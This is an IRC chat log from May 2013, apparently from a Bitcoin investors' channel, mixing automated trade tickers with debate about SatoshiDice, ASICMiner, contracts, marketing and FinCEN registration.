[ASICMINER-PT] 2 @ 1.775 = 3.55 BTC [+] May 16 21:22:34 [BTCTC] [ASICMINER-PT] 5 @ 1.775 = 8.875 BTC [+] May 16 21:23:27 what is the all-time low on s.dice? May 16 21:23:56 ~0.0008 I think May 16 21:24:13 1/4th of IPO May 16 21:24:30 wow .. did it hit that in this recent dump or was that from earlier? May 16 21:24:42 toffoo there was a dump back in january i think ? May 16 21:24:45 Much earlier May 16 21:24:55 [BTCTC] [TAT.ASICMINER] 26 @ 0.017273 = 0.4491 BTC [+] May 16 21:25:02 ok gotcha, thanks May 16 21:25:11 [BTCTC] [TAT.ASICMINER] 60 @ 0.017275 = 1.0365 BTC [+] May 16 21:25:32 [BTCTC] [TAT.ASICMINER] 80 @ 0.017278 = 1.3822 BTC [+] May 16 21:25:50 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] May 16 21:27:02 http://gawker.com/google-wallet-will-soon-allow-you-to-send-money-as-a-g-507104861 May 16 21:27:09 depr May 16 21:27:23 [BTCTC] [TAT.ASICMINER] 66 @ 0.01728 = 1.1405 BTC [+] May 16 21:27:24 [BTCTC] [BASIC-MINING] 8 @ 0.48 = 3.84 BTC [+] May 16 21:30:03 [HAVELOCK] [ASICM] 2 @ 0.017 = 0.034 BTC [-] May 16 21:30:34 [BTCTC] [ASICMINER-PT] 1 @ 1.775 BTC [+] May 16 21:30:59 [MPEX] [S.MPOE] 2800 @ 0.0006685 = 1.8718 BTC [-] May 16 21:31:10 Namworld: soon(tm) May 16 21:32:01 like wave(tm) May 16 21:32:35 [BTCTC] [TAT.ASICMINER] 34 @ 0.017278 = 0.5875 BTC [-] May 16 21:33:39 [BTCTC] [ASICMINER-PT] 5 @ 1.775 = 8.875 BTC [+] May 16 21:33:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.0172 = 0.0688 BTC [-] May 16 21:35:26 [BTCTC] [BTC-GOLD] 1 @ 0.0035 BTC [-] May 16 21:35:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.016801 = 0.1176 BTC [-] May 16 21:38:25 i lost message from scrollback May 16 21:38:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.016801 BTC [-] May 16 21:40:33 [BTCTC] [ASICMINER-PT] 1 @ 1.773999 BTC [-] May 16 21:43:32 [BTCTC] [ASICMINER-PT] 1 @ 1.774 BTC [+] May 16 21:51:13 [BTCTC] [ASICMINER-PT] 1 @ 1.773999 BTC [-] May 16 21:52:16 [BTCTC] [ASICMINER-PT] 4 @ 1.774 = 7.096 BTC [+] May 16 21:53:06 [BTCTC] [ASICMINER-PT] 3 @ 1.774 = 5.322 BTC [+] May 16 21:53:23 [BTCTC] [ASICMINER-PT] 1 @ 1.775 BTC [+] May 16 21:53:56 greetings May 16 21:54:06 [BTCTC] [TAT.ASICMINER] 14 @ 0.0172 = 0.2408 BTC [+] May 16 21:54:22 howdy o/ May 16 21:54:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.01728 = 0.1555 BTC [+] May 16 21:54:55 [BTCTC] [TAT.ASICMINER] 31 @ 0.01728 = 0.5357 BTC [+] May 16 21:55:54 havent we had enough excitement? May 16 21:56:06 it's like every week we have fireworks May 16 21:56:34 bitcoin is backed by drama May 16 21:56:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.01728 = 0.0346 BTC [+] May 16 21:57:19 gox seizure, sdice drama May 16 21:57:27 AM mega div May 16 21:57:36 so much drama over nothing with satoshidice May 16 21:57:42 chaang nois new bicycle May 16 21:57:46 so exciting May 16 21:58:05 some big shareholder should just clone the SD website and make it available in the US May 16 21:58:14 problem solved. boom. May 16 21:58:32 then that person has same liability obv May 16 21:58:45 boom May 16 21:59:01 pay for a domain name in btc, host on heroku, anonymous website, boom. May 16 21:59:26 i'll probably end up eating my words, but at the moment i have no problem saying that i think sdice is dead in the water May 16 21:59:32 ship has sailed May 16 22:00:36 [BTCTC] [TAT.ASICMINER] 22 @ 0.016801 = 0.3696 BTC [-] May 16 22:00:48 [BTCTC] [TAT.ASICMINER] 34 @ 0.0167 = 0.5678 BTC [-] May 16 22:03:22 [BTCTC] [ASICMINER-PT] 1 @ 1.775 BTC [+] May 16 22:04:03 what makes you think that it won't make it even more attractive ? May 16 22:04:07 to US customers May 16 22:04:16 it's like... forbidden May 16 22:05:41 [BTCTC] [TAT.ASICMINER] 56 @ 0.01728 = 0.9677 BTC [+] May 16 22:06:04 simple May 16 22:06:09 it's been faltering for months May 16 22:06:28 and has received no visible or "tangible" attention May 16 22:06:32 no new features May 16 22:06:35 no new anything May 16 22:06:46 site mostly performed shitty anyway May 16 22:06:57 so any amount of obfuscating it's accessibility May 16 22:07:07 is just another nail in the coffin May 16 22:07:17 this isn't tv tho. May 16 22:07:29 clarify May 16 22:07:42 you mean the vidible part? May 16 22:07:44 s May 16 22:07:48 people can watch waht they want May 16 22:07:58 there's this very american worshipping of a very particular thing May 16 22:08:01 hipsters care about features, investors car about dividends May 16 22:08:04 people dont seek out tv shows because they are harder to watch May 16 22:08:11 :-) May 16 22:08:16 streisand May 16 22:08:22 i care about noth May 16 22:08:23 bnoth May 16 22:08:26 both! May 16 22:08:28 lol May 16 22:08:44 but srsly, most things worth it in this life aren't what's being hyped May 16 22:08:52 most hyped things aren't worth the time of day May 16 22:08:57 most "famous" people are poor. May 16 22:09:03 most rich people you've never heard of May 16 22:09:05 but your are transferring the argument May 16 22:09:06 you can't deal-with-it me May 16 22:09:14 most popular jobs are dead. most lucrative jobs are "boring" May 16 22:09:14 etc May 16 22:09:18 i had the sunglasses on my forum avatar first May 16 22:09:24 my point isnt that hype is a fundamental May 16 22:09:29 it isn't. May 16 22:09:37 also, the "consumer" market is unfundamental. May 16 22:09:38 and so on May 16 22:09:42 it's that marketing, communication, and development are important May 16 22:09:55 not as commonly understood. May 16 22:10:05 i think sd markets itself for free on the frontpage of blockchain.info May 16 22:10:12 big deal May 16 22:10:18 it's nice n all May 16 22:10:21 and certainly a win May 16 22:10:22 what davout said May 16 22:10:23 and im not transferring the argument, i'm just not particularly interested in arguiubng about s.dice per se, i think the general point is more interesting May 16 22:10:31 but you can't just stop May 16 22:10:46 yes you can. this website fetish... May 16 22:10:50 my issue is not just with sdice May 16 22:10:52 websites are for blogs. May 16 22:11:06 well i think s.dice is dead and SD will be fine May 16 22:11:11 there's no good reason random, service x should be a website. May 16 22:11:12 ThickAsThieves: like I said, someone who has a stake in this *will* put up a US accessible clone of the SD website May 16 22:11:34 davout i'd take that as a good proxy for how valuable a website is for sdice May 16 22:11:34 you might not WANT marketing to matter or have a suitable rationale for it within yourself May 16 22:11:41 but it proves itself when used May 16 22:11:55 davout May 16 22:12:06 my issue is much more than the website to US problem May 16 22:12:07 howso May 16 22:12:17 so what is it ? May 16 22:12:26 it's lack of development May 16 22:12:41 this attitude is what leads to creeping featuritis and general cruft. May 16 22:12:51 mircea_popescu: word May 16 22:13:00 so nothing should ever be developed past it's initial state? May 16 22:13:11 its* May 16 22:13:12 has anyone bothered to plot relative market share of the btc gambling space? May 16 22:13:16 would you like for satoshidice to add more features and a whole frontend/backend server architecture? May 16 22:13:21 we could actually talk about execution instead of features then May 16 22:13:24 allow players to create "accounts"? May 16 22:13:27 ThickAsThieves: does it need to ? May 16 22:13:31 not happenin May 16 22:13:35 ThickAsThieves past uits mature state. May 16 22:13:42 for example : i am now eating a praline May 16 22:13:43 nothing needs to do anything May 16 22:13:52 but we invest to make money right? May 16 22:13:55 this particular piece of confectionery has been unchanged since three centuries ago May 16 22:14:01 i am persuaded louis ate the exact same thing. May 16 22:14:15 and investors expect a business to maintain and moreover gain revenue right? May 16 22:14:21 yes, pralines are dead to the us market, in the sense that the uninformed poor there don't get any. May 16 22:14:51 why use analogies when we already have a working example May 16 22:15:07 i know May 16 22:15:10 in my mind investors are making a revenue from their holding May 16 22:15:26 truffles: that's called having fun :-) May 16 22:15:36 i simply expect action May 16 22:15:42 what's next May 16 22:15:44 etc May 16 22:15:58 yeah but i don't think that's particularly relevant. May 16 22:16:03 hehe May 16 22:16:04 so you wish to be entertained by your portofolio May 16 22:16:06 i do not. May 16 22:16:08 no May 16 22:16:10 ThickAsThieves: buddhism teaches us that "not doing" is already "doing" if you see what I mean May 16 22:16:11 i wish for it to grow May 16 22:16:37 ThickAsThieves this growth thing... it often is illusory. May 16 22:16:43 sure May 16 22:16:50 i mean... enron grew. May 16 22:16:55 whatever May 16 22:16:56 [BTCTC] [TAT.ASICMINER] 55 @ 0.01728 = 0.9504 BTC [+] May 16 22:17:01 growth can happen May 16 22:17:03 buddhism is like nihilism May 16 22:17:05 mircea_popescu: these suction pumps do not work May 16 22:17:06 sometimes it's illusory May 16 22:17:06 the U.S. has grown May 16 22:17:08 zero impact May 16 22:17:26 ThickAsThieves: yes and no May 16 22:17:27 jcpham yeah, i love the sprawl too. May 16 22:17:29 I enjoy life because of all the things I can DO May 16 22:17:40 not all the things I can watch be as they are May 16 22:17:53 anyway. point being : the hammer has not grown. it is what it is. May 16 22:18:00 i want to tinker, explore, develop, evolve May 16 22:18:04 toilet paper is basically... toilet paper. May 16 22:18:07 that's what it is. May 16 22:18:08 ThickAsThieves: watching things as they are is already doing something, which can bring great enjoyment May 16 22:18:12 which extends to me wanting this for all things May 16 22:18:23 ThickAsThieves that's fine but not all things are that. May 16 22:18:29 ThickAsThieves: it's not mutually exclusive May 16 22:18:33 s.dice is a mature company dominating its niche May 16 22:18:36 but profit is May 16 22:18:43 it will behave accordingly. you want excitement, chase the vircurex ipos or w/e May 16 22:18:48 different models. May 16 22:18:57 i want evolution May 16 22:19:00 not excitement May 16 22:19:06 progression May 16 22:19:15 let's talk about evolution then May 16 22:19:25 what is this NAT.ROUTERS thing? May 16 22:19:35 a joke May 16 22:19:37 like sdice May 16 22:19:51 lol. dude srlsy. May 16 22:19:58 i just find it insulting May 16 22:20:18 ThickAsThieves: what is it that pokes your ego ? :p May 16 22:20:32 i tried to explain this May 16 22:20:59 sdice was a spark May 16 22:21:08 but never a fire May 16 22:21:23 it still can be i guess May 16 22:21:29 but no signs of warmth May 16 22:21:34 yeah, who knows May 16 22:22:05 i fail to follow this logic. May 16 22:22:06 i want to put my money to work May 16 22:22:10 ThickAsThieves: you expect change when some other folks don't see the need for it May 16 22:22:13 sdice always was and still is the majority of rthe blockchain May 16 22:22:16 not bury it in the dirt May 16 22:22:26 if this is a spark but not a fire then what can io tell you May 16 22:22:48 erik has expressed he has stuff brewing repeatedly May 16 22:23:02 yet soup is not served May 16 22:23:14 ThickAsThieves it's barely a one year old company. May 16 22:23:31 most companies fail to file at all after their first year May 16 22:23:32 it take 1 year to communicate plans with investors? May 16 22:23:39 of the 5%ish that do, 90+% file a loss. May 16 22:23:49 plans are no investors' busines. May 16 22:24:13 you want to be involved in business planning, start one. May 16 22:24:17 i like that attitude, that plans are not investors business. May 16 22:24:18 so would you argue that with all that is known to the public, May 16 22:24:25 sdice is a better investment than most? May 16 22:24:27 you're buying into someone else's specifically so as not to have to deal with that. May 16 22:24:28 it's not a terribly common perspective... May 16 22:24:49 ThickAsThieves as far as i can see, other than mpoe (which may well be oversold), sdice is the only investment available atm. May 16 22:24:50 plans are not investors business May 16 22:25:00 bitbet is small. asicminer doesn't practically exist. it's take it or leave it. May 16 22:25:09 please May 16 22:25:12 hey. May 16 22:25:28 you keep painting AM as a blip May 16 22:25:35 it is. May 16 22:25:41 lols May 16 22:25:47 no contract, no business. sorry but it's what it is. May 16 22:25:49 if its not on mpex it isnt real May 16 22:25:59 you don't have to agree, but you won't change this whether you agree or you don't. May 16 22:26:01 what good has sdice's contract done anyone? May 16 22:26:16 other than the seed investors May 16 22:26:26 appearance of legitimacy May 16 22:26:27 it can be read by anyone. May 16 22:26:33 to the extent that exists in this space. May 16 22:26:43 it clearly delineates what anyone can reasonably expect. etc. May 16 22:26:50 the stuff contracts normally do. May 16 22:27:03 but it doesnt protect investors from a number of things that could easily circumvent the contract into worthlessness May 16 22:27:13 such as? May 16 22:27:21 erik = the whale May 16 22:27:36 no contract protects the investors or any parties against the very contract being breached. May 16 22:27:42 mp deciding to interpret any line creatively May 16 22:27:48 contracts (like any other thing in the world) work by working not by being broken May 16 22:27:59 a boat doesn't take you across the sea by being sunk May 16 22:28:11 so you want to say contracts are the real deal, but dont actually protect you May 16 22:28:18 here comes the gpg May 16 22:28:19 so whats the difference May 16 22:28:42 ThickAsThieves basically where you're coming from is this : "i'm here in the land of the thieves, better pack as much and run while i still have my legs" May 16 22:28:51 this may be informed by experience, heck, it may even be the correct stance in btc. May 16 22:29:02 nevertheless, i won't have any of it, it's not what i'm building nor what i stand for. May 16 22:29:07 no May 16 22:29:14 the only way this divide will be healed is through time. so i'm not in any rush for anything to happen. May 16 22:29:18 it is you that is making the assumption that AM is the thief May 16 22:29:20 in waiting May 16 22:29:30 no I May 16 22:29:31 not quite. May 16 22:29:59 as I see it, both sdice and AM could fuck me over any number of ways May 16 22:30:12 yes. this is the thing : at this point anything "could" happen May 16 22:30:13 yet Friedcat has demonstrated enormous achievements May 16 22:30:26 and erik has demonstrated a joker avatar May 16 22:30:30 ten years down the road things will have played out as i said they will, and they could no longer play any number of ways. May 16 22:31:16 investing in people is safer to me May 16 22:31:22 than investing in an mpex contracyt May 16 22:31:24 so that's fine. May 16 22:31:42 if erik were demonstrating intitiative May 16 22:31:52 or any sort of business prowess May 16 22:32:01 i might think differently May 16 22:32:21 the great advantage of btc is that it'sd a perfectly even ideal field on which everyone's understanding can be tested May 16 22:32:22 ... May 16 22:32:45 and while i dont think of everyone as thieves in waiting May 16 22:32:56 i do think my positions need to be temporal May 16 22:32:58 and agile May 16 22:33:04 [HAVELOCK] [HIM] 2 @ 1.91 = 3.82 BTC [-] May 16 22:33:12 due to the pitfalls that litter btc business May 16 22:33:30 I'm not saying I wanna make babies with Friedcat May 16 22:33:33 so basically not X but X. May 16 22:33:43 [BTCTC] [BASIC-MINING] 1 @ 0.47 BTC [-] May 16 22:33:57 I'm saying the actual environment changes May 16 22:34:13 right, let's not get anchored in the words. May 16 22:34:18 so some jumping around is profitable May 16 22:34:26 the idea is that you perceive this medium as dangerous and i aim to make it safe. May 16 22:34:47 "benkay: here comes the gpg" << LOL May 16 22:34:50 the idea is for btc to be a safer place than anywhere else, not some mythical land you raid now and again May 16 22:34:52 and sdice investors are safely losing money each week May 16 22:34:59 how exactly are they losing money ? May 16 22:35:04 [BTCTC] [ASICMINER-PT] 1 @ 1.771 BTC [-] May 16 22:35:28 depends on how much you value divs vs share value vs future potential May 16 22:35:45 [BTCTC] [ASICMINER-PT] 1 @ 1.774999 BTC [+] May 16 22:35:55 depends if you're a daytrader marking to market on a daily basis. May 16 22:36:05 as far as i know there's a total of three people actually qualified to be doing this. May 16 22:36:38 whom? May 16 22:36:51 ya well. May 16 22:37:44 mircea_popescu: how's the hiring ladybytes on your traders team coming along? May 16 22:37:52 maybe I am projecting unnecessary expectations on sdice May 16 22:37:54 lol she's skulking May 16 22:38:00 so be it May 16 22:38:07 ThickAsThieves: http://trilema.com/2012/gpg-contracts/ May 16 22:38:33 ThickAsThieves look, everyone does his own thinking, has his own expectations... May 16 22:38:44 the market is a voting machine doubling as a weighing machine May 16 22:38:52 except we don't yet have the long term for the later, so. May 16 22:39:04 [HAVELOCK] [ASICM] 10 @ 0.0185 = 0.185 BTC [+] May 16 22:39:06 [HAVELOCK] [ASICM] 40 @ 0.01851995 = 0.7408 BTC [+] May 16 22:39:12 lol May 16 22:39:28 no meat enters this sanctum May 16 22:39:30 hehe May 16 22:39:58 skulking or sulking? May 16 22:40:06 same thing? May 16 22:40:15 nope. May 16 22:40:17 not same thing. May 16 22:40:19 nope nope nope. May 16 22:41:02 https://www.youtube.com/watch?v=gvdf5n-zI14 May 16 22:41:05 ah May 16 22:41:40 didnt realize the word meant that May 16 22:41:44 pretty cool actually May 16 22:41:51 hehe May 16 22:42:08 til eh. May 16 22:42:53 i need to decompress now May 16 22:42:56 you guys... May 16 22:43:22 wat May 16 22:43:49 it's like drinking with philosophers May 16 22:43:53 a total chore May 16 22:44:02 consider this perspective May 16 22:44:04 [HAVELOCK] [ASICM] 32 @ 0.01851995 = 0.5926 BTC [+] May 16 22:44:16 all business have always been valued in ever-decreasingly valuable fiat currency May 16 22:44:28 you for like a few hundred years or something May 16 22:44:32 ;;stats May 16 22:44:32 I have 19 registered users with 24 registered hostmasks; 1 owner and 0 admins. May 16 22:44:41 ;;bc,stats May 16 22:44:44 Current Blocks: 236495 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 1392 blocks | Next Difficulty In About: 1 week, 2 days, 17 hours, 37 minutes, and 20 seconds | Next Difficulty Estimate: 12063933.6679 | Estimated Percent Change: 7.83638 May 16 22:44:47 lmao the things he complains about May 16 22:44:59 at least you don't have 45k in college debt for the priviledge ThickAsThieves May 16 22:45:26 [MPEX] [S.MPOE] 10400 @ 0.0006685 = 6.9524 BTC [-] May 16 22:45:35 truffles, you'd be surprised May 16 22:45:36 westerners always want their capital to increase May 16 22:45:37 it's a lie May 16 22:45:41 is it just me or is forbes the landfill of internet journalism ? http://www.forbes.com/sites/timworstall/2013/05/16/it-could-be-the-bureaucrats-that-kill-bitcoin/ May 16 22:45:45 they really just want their capital to not decrease May 16 22:46:00 i am trying to make money May 16 22:46:05 like most of us i assume May 16 22:46:10 yeah May 16 22:46:12 davout just like any other venue. May 16 22:46:16 without delivering value tho May 16 22:46:28 i deliver value May 16 22:46:30 just by moving assets around, getting into and out of positions etc May 16 22:46:41 i provide a number of services May 16 22:46:42 not to s.dice :) May 16 22:46:46 not to sdice May 16 22:46:48 hehe May 16 22:47:07 if you don't deliver value to a company, don't expect them to deliver returns to your pocket May 16 22:47:13 maybe your stake won't disappear in inflation May 16 22:47:19 but don't expect to make out like a gangster May 16 22:47:30 that happens by luck. May 16 22:47:41 your argument seems to result in May 16 22:47:45 well, this is the classical smaller rocks argument May 16 22:47:46 dont invest in companies May 16 22:47:46 if he May 16 22:47:57 's moving stuff back and forth he's providing liquidity which is still a service. May 16 22:48:02 sure May 16 22:48:08 there's *some* value May 16 22:48:12 right. May 16 22:48:24 not dismissing the role of traders and liquidity providers entirely May 16 22:48:43 i also help large shareholders unload their positions, small shareholders buy small stakes May 16 22:48:44 i'm not saying don't invest May 16 22:48:55 that's how you prevent the capital you've acquired from disappearing in inflation May 16 22:48:55 mircea_popescu: moving stuff around provides liquidity to someone but eats liquidity somewhere else, ends up neutral May 16 22:48:57 so i save time for some as well May 16 22:48:59 but that shit won't make you rich. May 16 22:49:40 hmm, i guess taking liquidity is also providing liquidity at the same time May 16 22:49:41 nvm May 16 22:49:42 https://bitcointalk.org/index.php?topic=99497.msg2172182#msg2172182 << mp theyre about to steal your heated asic floor tiles idea too! May 16 22:50:25 i also provide information May 16 22:50:35 monetize that, man May 16 22:50:47 and soon I will be sponsoring other people's efforts as well May 16 22:50:55 that are providing services May 16 22:51:08 impact is important to me May 16 22:51:13 that sounds like value May 16 22:51:34 unlike buying into ipos May 16 22:51:44 now if you take those things to ipo, you too can make out like a bandit May 16 22:51:46 and you'd be surprised the money that can be made moving stones around May 16 22:52:32 also likely surprised at the impact good marketing can have on exposing your services May 16 22:52:42 but i digress May 16 22:52:44 i guess May 16 22:52:51 oh no i agree w/r/t marketing May 16 22:53:04 [HAVELOCK] [ASICM] 5 @ 0.0184 = 0.092 BTC [-] May 16 22:53:10 and i'm not surprised that it's possible to make money shuffling things around May 16 22:53:13 see it erryday May 16 22:53:16 most here seem to think marketing is purely about spin May 16 22:53:20 the funny thing is on one hand i told everyhone when they were here to be defensive players May 16 22:53:26 [BTCTC] [ASICMINER-PT] 2 @ 1.774999 = 3.55 BTC [+] May 16 22:53:33 and now you're getting all excited cause erik is playing a lot of defense May 16 22:53:42 [BTCTC] [ASICMINER-PT] 8 @ 1.774999 = 14.2 BTC [+] May 16 22:53:52 not true mp May 16 22:54:05 my complaints pre-date this US website stuff May 16 22:54:09 several times over May 16 22:54:13 ok but consider : bfl did a lot of marketing May 16 22:54:17 mtgox did a lot of marketing May 16 22:54:21 well May 16 22:54:24 starting to see a lot of pattern ? May 16 22:54:26 you have to deliver as well May 16 22:54:41 they have also made out with shittons of money May 16 22:54:46 indeed May 16 22:54:48 but May 16 22:54:48 heck, coin* did a lot of marketing May 16 22:54:52 benkay seriously ? what ? May 16 22:54:54 bfl did not provide value May 16 22:55:02 nor did they deliver May 16 22:55:02 anything under 1bn is a joke, i hope we're clear. May 16 22:55:05 now imagine May 16 22:55:06 bfl and gox are rolling in it! May 16 22:55:08 oh fine May 16 22:55:10 if bfl had good marketing May 16 22:55:12 and delivered May 16 22:55:18 AM would be dead already May 16 22:55:22 for the sort of position, for the sort of circumstance, 1 bn is a joke. May 16 22:55:24 [BTCTC] [ASICMINER-PT] 4 @ 1.774999 = 7.1 BTC [+] May 16 22:55:26 or at least half-dead May 16 22:55:52 [BTCTC] [ASICMINER-PT] 1 @ 1.775 BTC [+] May 16 22:56:34 benkay consider : myspace sold itself for a bn. back a decade ago, before the qe. groupon's COMPETITOR is valued north of 3bn, after shedding a lot of valuation. May 16 22:56:39 what are these things ? what do they do ? May 16 22:56:46 nothing compared. May 16 22:56:54 let me clarify: for scammers who advertise well, they made out like bandits. May 16 22:56:58 i always called groupon as useless May 16 22:56:59 sure. May 16 22:57:03 [BTCTC] [ASICMINER-PT] 2 @ 1.775 = 3.55 BTC [+] May 16 22:57:05 [HAVELOCK] [ASICM] 1 @ 0.0184 BTC [-] May 16 22:57:10 they provided a service, to early investors May 16 22:57:15 thats about it May 16 22:57:31 otherwise they gutted small business May 16 22:57:46 myeah. May 16 22:57:50 was sad really. May 16 22:57:57 same exact business model as the airbnb thing May 16 22:58:04 wat May 16 22:58:06 gutting lease people. May 16 22:58:15 lease people? May 16 22:58:23 it's getting disgusting to watch, all these "businesses" into mass-gutting May 16 22:58:33 benkay yes. it is against your lease pretty much everywhere to sublet May 16 22:58:36 especially to transients May 16 22:58:55 it is against city ordinances too , in most metro areas. May 16 22:59:10 my mom sent me this email today: "Subj: Klout.com - I just saw a thing on Nightline about it. Kinda like Linkedin I think....only they rate you with a number...not for me...lol....but I am curious what you think about it...?" May 16 22:59:14 makes me mad May 16 22:59:40 klout is kinda funny, keeps sucking my cock. "o, you've been retweeted 67 times this week. average uis 6" May 16 22:59:46 bla bla bla. clikc more please. May 16 23:00:05 like wtf is nightline now, product placement? May 16 23:00:14 yeah but screw those ordinances, mp May 16 23:00:28 they were all put in place to drive the boarding houses out of business May 16 23:00:35 right-o. May 16 23:00:49 so basically the model is, fuck your relationship with your landlord and the city hall May 16 23:00:55 so -2-3k May 16 23:01:00 my lease allows for subletting May 16 23:01:04 and out of it we extract 50 bux and you can have 20 May 16 23:01:19 [BTCTC] [BITVPS] 343 @ 0.000699 = 0.2398 BTC [+] May 16 23:01:20 and the city halls rules benefit hotel owners at my expense May 16 23:01:23 classic cartel shit May 16 23:01:28 not really. May 16 23:01:42 i wouldn't want to live next to some random penny-ante inkeeper in his mind. May 16 23:02:05 with modern reputation tracking tools he'd be out of business rather quickly i imagine May 16 23:02:10 freedom is great for rural areas. to live in a city you must necessarily be very, very submissive. May 16 23:02:32 the only way people can pack that tight : everyone washes, everyone moves slowly etc May 16 23:02:42 only true recently, though. see paris, london, rome? May 16 23:02:42 [BTCTC] [BITVPS] 1 @ 0.00075 BTC [+] May 16 23:03:22 [BTCTC] [BITVPS] 500 @ 0.000799 = 0.3995 BTC [+] May 16 23:03:33 washing is overrated; an artifact of the "smell good" industry. May 16 23:03:41 lolk May 16 23:03:51 that said, demand it of all partners. May 16 23:04:04 even earlier. pick a time and place, they had some sort of town screwdown. May 16 23:04:07 [BTCTC] [BITVPS] 500 @ 0.000848 = 0.424 BTC [+] May 16 23:04:16 screwdown? May 16 23:04:22 heck, you weren't even allowed in medieval german towns unless you were a burgher May 16 23:04:35 what is this washing thing everyone keeps talking about May 16 23:04:45 actually something like that i'd like to see. costs you 100k a year to live in London. tyou don'ty like it, move to wolverhampton May 16 23:04:56 and if you want to be a great burgher, 1.5mn May 16 23:05:05 [HAVELOCK] [ASICM] 15 @ 0.01849999 = 0.2775 BTC [+] May 16 23:05:06 [HAVELOCK] [ASICM] 145 @ 0.0185 = 2.6825 BTC [+] May 16 23:05:11 [MPEX] [S.MPOE] 8400 @ 0.0006685 = 5.6154 BTC [-] May 16 23:05:18 i did enjoy new york, but i couldn't swing the burgher's fee. May 16 23:06:05 [HAVELOCK] [HIM] 1 @ 1.9301 BTC [+] May 16 23:08:25 awell. May 16 23:11:39 powerful motivator, those sparkly lights. May 16 23:11:51 subject of, i recommend the new Gatsby flick. May 16 23:12:05 [HAVELOCK] [VTX] 5 @ 0.4444 = 2.222 BTC [+] May 16 23:12:13 would you donate if vim displayed a bitcoin address on its splash screen ? (got a reply from bram molenaar after emailing him about it) May 16 23:14:51 hahaha May 16 23:15:00 maybe. May 16 23:15:02 [BTCTC] [BITVPS] 10 @ 0.000856 = 0.0086 BTC [+] May 16 23:15:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0172 BTC [-] May 16 23:17:56 [BTCTC] [BITVPS] 100 @ 0.000857 = 0.0857 BTC [+] May 16 23:20:22 Hello May 16 23:20:29 'lo sir May 16 23:21:17 u no come to disturb. May 16 23:23:54 ok, i'll push it, i'll promise a 5 BTC donation, can I tell him I have already some folks who committed to donating ? May 16 23:25:43 it might take a while until i get to see that address in debian stable. even a 0.01 BTC donation should be huge then May 16 23:26:49 why not, davout? May 16 23:26:50 who knows, it could be in ubuntu pretty fast May 16 23:26:59 just tell him you have 5btc line up May 16 23:27:03 lined* May 16 23:27:05 heck May 16 23:27:07 benkay: these are mine :-) May 16 23:27:08 offer it as abounty May 16 23:27:30 yeah i ain't gonna May 16 23:27:49 honestly i'd rather donate to tim pope May 16 23:28:07 benkay: that's fine :) just looking to promise him some sexier amount with the help of some other bitcoin-tards May 16 23:28:22 but that's neither here nor there. the point is to put a bitcoin tip address on all of the splash screens amirite? May 16 23:29:57 [MPEX] [S.MPOE] 18400 @ 0.00066858 = 12.3019 BTC [+] May 16 23:29:58 [MPEX] [S.MPOE] 5300 @ 0.00067001 = 3.5511 BTC [+] May 16 23:33:13 [MPEX] [S.MPOE] 4321 @ 0.00066974 = 2.8939 BTC [-] May 16 23:33:14 [MPEX] [S.MPOE] 18479 @ 0.00067001 = 12.3811 BTC [+] May 16 23:34:05 [HAVELOCK] [ASICM] 55 @ 0.0185 = 1.0175 BTC [+] May 16 23:34:06 [HAVELOCK] [ASICM] 1 @ 0.0185 BTC [+] May 16 23:35:05 [HAVELOCK] [ASICM] 153 @ 0.0175 = 2.6775 BTC [-] May 16 23:35:53 benkay: the point is to help molenaar to help the kids from uganda and at the same time spread the bitcoin love to all the geeks that use vim May 16 23:36:04 [HAVELOCK] [ASICM] 1 @ 0.0185 BTC [+] May 16 23:37:37 [BTCTC] [TAT.ASICMINER] 13 @ 0.01711 = 0.2224 BTC [-] May 16 23:42:06 [BTCTC] [GSDPT] 100 @ 0.0027 = 0.27 BTC [-] May 16 23:43:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.017199 = 0.086 BTC [+] May 16 23:46:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.017199 = 0.172 BTC [+] May 16 23:49:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.0172 = 0.0688 BTC [+] May 16 23:49:17 [BTCTC] [BITVPS] 10 @ 0.000701 = 0.007 BTC [-] May 16 23:49:21 [BTCTC] [BITVPS] 100 @ 0.0007 = 0.07 BTC [-] May 16 23:49:25 [BTCTC] [BITVPS] 1 @ 0.00069 BTC [-] May 16 23:49:46 [BTCTC] [BITVPS] 2 @ 0.00066 = 0.0013 BTC [-] May 16 23:49:52 [BTCTC] [BITVPS] 170 @ 0.000641 = 0.109 BTC [-] May 16 23:49:57 [BTCTC] [BITVPS] 50 @ 0.00064 = 0.032 BTC [-] May 16 23:51:22 hey mp, I got a reply from CampBX May 16 23:51:26 about the MSB# May 16 23:51:29 "We have received this question a lot, and the direct answer is that our application is under review by FinCEN. However to be honest compliance is far more complicated so boiling it down to FinCEN check box is overly simplistic." May 16 23:51:59 also they'd need to register in all 50 states, which is horribly expensive May 16 23:55:19 mkay so what's the # May 16 23:55:31 do you get a nuber for applying? May 16 23:55:50 number* May 16 23:55:59 well of course May 16 23:56:14 how do they know they're under review ? May 16 23:56:36 got a brick through the window scribbled in lipstick with "your application is under review, don;'t call us we'll call you" ? May 16 23:56:53 that's what i assumed May 16 23:57:05 bricks are no good here? May 16 23:57:09 yeah it's how it normally works. May 16 23:57:19 means fincen received the application and preemptively lost/misfiled it May 16 23:57:52 lol. anyway. May 16 23:58:05 [HAVELOCK] [VTX] 3 @ 0.4449 = 1.3347 BTC [+] May 16 23:58:39 anyway, funny. "are you a doctor ? " "yes i am" "where's your diploma ?" "Well i'm in school and really being a doctor is more of a philosophical point May 16 23:58:48 boiling it down to the diploma checkbox is terribly simplistic" May 17 00:00:04 [HAVELOCK] [ASICM] 1 @ 0.0185 BTC [+] May 17 00:00:44 whats with these americans. karpeles uses existing company to move money and thinks it will be fine May 17 00:01:06 cuz the company was not doing it before, so all shall be fine May 17 00:01:27 is Mark american? May 17 00:01:37 he seems awfully foreign May 17 00:01:41 other than all the pizza May 17 00:01:52 http://www.fincen.gov/financial_institutions/msb/msbstateselector.html May 17 00:02:33 no bulbul May 17 00:02:37 no campbx May 17 00:02:45 look for bitinstant May 17 00:02:50 you'll find them May 17 00:02:55 the form is real :D May 17 00:03:30 bitfloor is there May 17 00:04:08 vim donations thread : http://bitcointalk.org/index.php?topic=207559.new#new May 17 00:04:11 